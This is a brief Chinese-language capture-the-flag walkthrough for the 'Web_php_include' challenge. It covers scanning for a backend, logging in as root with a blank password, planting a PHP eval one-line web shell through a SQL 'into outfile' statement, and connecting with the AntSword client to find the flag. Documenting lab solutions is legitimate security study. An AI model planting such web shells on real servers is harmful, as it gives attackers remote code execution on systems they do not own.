Web_php_include 1、通过御剑扫描后台发现登录后台,双击进去 2、登录名:root 密码为空进入后台,并编辑一句话木马执行 select "<?php eval(@$_POST['ctf']); ?>"into outfile ‘/tmp/test.php’ 3、打开中国蚁剑输入url地址和密码,连接后打开改地址 4、发现flag再www目录下的fl4gisisish3r3.php by hsc-浓眉